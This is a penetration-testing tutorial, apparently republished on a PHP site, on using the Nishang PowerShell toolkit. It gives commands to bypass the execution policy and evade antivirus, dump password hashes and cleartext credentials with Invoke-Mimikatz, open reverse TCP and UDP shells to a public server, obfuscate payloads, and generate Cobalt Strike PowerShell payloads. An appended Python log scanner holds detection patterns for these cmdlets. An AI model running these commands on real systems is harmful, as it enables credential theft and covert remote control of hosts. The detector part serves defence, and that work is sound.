Before getting started with PowerShell, let's first understand the concept. PowerShell can be regarded as an upgraded version of cmd (the bat scripting language); it is a scripting language on the Windows platform, object-oriented and closely tied to the .NET Framework. It can also be thought of as the bash shell of Windows. Windows PowerShell is a command-line shell and scripting environment that lets command-line users and script writers take advantage of the power of the .NET Framework. It introduces many very useful new concepts that further extend the knowledge and scripts you build up in the Windows Command Prompt and Windows Script Host environments. The code runs in memory without touching the disk, and many security products cannot detect PowerShell activity: cmd.exe is usually blocked from running, but PowerShell is not. In practice, we need to get past some protective software during a penetration test, and besides using bypass scripts or other tools, PowerShell is also a good choice. For example, take mimikatz, the password-grabbing tool commonly run on target hosts. This tool, written by a French expert, is widely used; its most impressive feature is that it can directly obtain the clear text passwords of active Windows accounts from lsass.exe. But if you do not do a good job of evading detection, it will immediately be caught by a certain antivirus suite. Using PowerShell, an attacker can execute commands without touching the disk. Here are some commonly used tools:
Nishang is a penetration testing tool built on PowerShell. It integrates scripts and various payloads, such as password grabbing, port scanning, privilege escalation, and so on, and is used frequently by beginners in daily penetration testing. First we need to download the tool from https://github.com/samratashok/nishang. After the download is complete, we can see what the tool includes:
Below we use a specific lab environment to demonstrate the modules commonly used in penetration testing. Before the demonstration, we need to explain several common errors encountered when running PowerShell tools, such as permission problems when executing scripts and problems importing modules.
When a module is imported for the first time, PowerShell refuses to run it, because the default execution policy does not allow scripts. We need to change the execution policy to one that does allow them, namely RemoteSigned.
Let's check what the current execution policy is. Restricted does not allow any script to run, even with administrator rights. We need to change the policy by executing:
Set-ExecutionPolicy remotesigned. When we query the execution policy again, it is now RemoteSigned and scripts are allowed. Importing the script now succeeds; ignore the warning prompts that appear.
Execute the following to view the scripts contained in the imported module: Get-Command -Module nishang
List the information of this machine: Get-Information
Now that we have modified the execution policy, let's start the demonstration.
When we gain access to a server, we need to know whether the target host is a physical machine or a virtual machine. Execute the command: Check-VM
First of all, nishang also integrates scripts for grabbing passwords. Start by grabbing the hashes:
#Get-PassHashes //Simple and direct: grab the hashes and display them in the console;
#powershell -exec bypass -Command "& {Import-Module 'C:\nishang\Gather\Get-PassHashes.ps1';Get-PassHashes -PSObjectFormat | Out-File hash.txt}" //Grab the hashes and save them to a file of your choice.
Since we can grab the hashes, we can also grab the plaintext password. Let's first look at the password-grabbing script. We can see that Mimikatz is used here as well, but it is loaded from within the PowerShell script.
We can use the following command to get the clear text password:
#powershell -exec bypass -Command "& {Import-Module 'C:\nishang\Gather\Invoke-Mimikatz.ps1';Invoke-Mimikatz}" attempts to grab the clear text password of the current system user directly. (This is the most commonly used command.)
During penetration tests, when doing port forwarding we run into antivirus suites again and again: nc, lcx, socks proxies and the like are killed or intercepted from time to time. In that situation we can use the port forwarding scripts in nishang. Besides the built-in port forwarding, we also try port forwarding with MSF here; both require a server on the public network.
1. TCP port forwarding (reverse connection)
Execute the listening command on the public network server: nc -lvp 5555
The target host executes the port forwarding command: Invoke-PowerShellTcp -Reverse -IPAddress 106.xxx.xxx.115 -Port 5555
In this way, after we execute the commands on the target host and on the public server respectively, the public server receives a reverse shell, through which we can run commands on the intranet server.
2. UDP port forwarding (reverse connection)
Execute the listening command on the public network server: nc -lup 6666
The target host executes the port forwarding command: Invoke-PowerShellUdp -Reverse -IPAddress 106.xxx.xxx.115 -Port 6666
Which parts of the payload need to be obfuscated must be specified in advance, which is done with the following command:
Set scriptblock 'payload';
We choose to obfuscate the entire command as a string (the specific choice depends on the penetration testing environment):
Select 1 for ASCII obfuscation, then enter out 1.ps1 to view the output. This command also saves the obfuscated file as 1.ps1 in the current directory:
Execute this script on the target host. The public network server listens on port 9999 and again successfully receives a reverse shell from the intranet host:
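As an added defensive example (not part of the original article or of the Nishang project), the following Python script scans PowerShell script-block log entries for the activity this article describes: the Nishang credential scripts (Get-PassHashes, Invoke-Mimikatz), the Invoke-PowerShellTcp/Udp -Reverse shells, execution policy changes and the -exec bypass switch, plus a heuristic for [char]-code obfuscation of the kind produced by ASCII obfuscation. The sample events, the indicator names and the obfuscation threshold are constructed assumptions.

```python
import re

# Constructed sample script-block log entries (Event ID 4104 style text).
# These are illustrative only, not real captures.
SAMPLE_EVENTS = [
    {"id": 1, "text": "Get-ChildItem C:\\Users | Select-Object Name"},
    {"id": 2, "text": "Set-ExecutionPolicy remotesigned"},
    {"id": 3, "text": "& {Import-Module 'C:\\nishang\\Gather\\Invoke-Mimikatz.ps1';Invoke-Mimikatz}"},
    {"id": 4, "text": "Invoke-PowerShellTcp -Reverse -IPAddress 203.0.113.10 -Port 5555"},
    {"id": 5, "text": "([char]73+[char]110+[char]118+[char]111+[char]107+[char]101) -join ''"},
    {"id": 6, "text": "powershell -exec bypass -Command \"& {Get-PassHashes -PSObjectFormat}\""},
]

# Indicators taken from the cmdlets and switches discussed in the article.
# The indicator names are assumed labels for this example.
INDICATORS = {
    "nishang-credential-access": re.compile(r"\b(Get-PassHashes|Invoke-Mimikatz)\b", re.I),
    "nishang-reverse-shell": re.compile(r"\bInvoke-PowerShell(Tcp|Udp)\b.*-Reverse", re.I),
    "execution-policy-change": re.compile(r"\bSet-ExecutionPolicy\b", re.I),
    "exec-bypass-switch": re.compile(r"-exec(utionpolicy)?\s+bypass", re.I),
}

# A [char]NN cast; many of them in one block suggest character-code obfuscation.
CHAR_CAST = re.compile(r"\[char\]\s*\d+", re.I)


def classify(text, char_threshold=5):
    """Return the list of indicator names matched by one script block."""
    hits = [name for name, rx in INDICATORS.items() if rx.search(text)]
    # Heuristic (assumption): a run of [char] casts is typical of ASCII-style
    # obfuscation; the threshold of 5 is a constructed value for this example.
    if len(CHAR_CAST.findall(text)) >= char_threshold:
        hits.append("char-code-obfuscation")
    return hits


def scan(events):
    """Map each event id to its matched indicators, omitting clean events."""
    result = {}
    for event in events:
        hits = classify(event["text"])
        if hits:
            result[event["id"]] = hits
    return result


if __name__ == "__main__":
    for eid, hits in scan(SAMPLE_EVENTS).items():
        print(f"event {eid}: {', '.join(hits)}")
```

Event 1 produces no hit, so it does not appear in the result; every other sample event is reported with the indicator(s) it matched.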
Cobalt Strike is a GUI-based penetration testing framework built on Metasploit. It integrates port forwarding, service scanning, automated overflow exploitation, multi-mode port listening, exe and PowerShell trojan generation, and more. It is also a powerful tool for intranet penetration. Here we only ask what sparks PowerShell and Cobalt Strike can strike together.
Cobalt Strike needs to be installed on the client and server respectively, and then start this tool:
First we start a listener on a port, set the public IP address as the host address, and then generate a PowerShell command. Run this command on the target host and the target host comes online; after that we can remotely grab passwords, escalate privileges, monitor the host and perform other operations:
The above is the detailed content of How to use Nishang, the PowerShell penetration testing tool. For more information, please follow other related articles on the PHP Chinese website!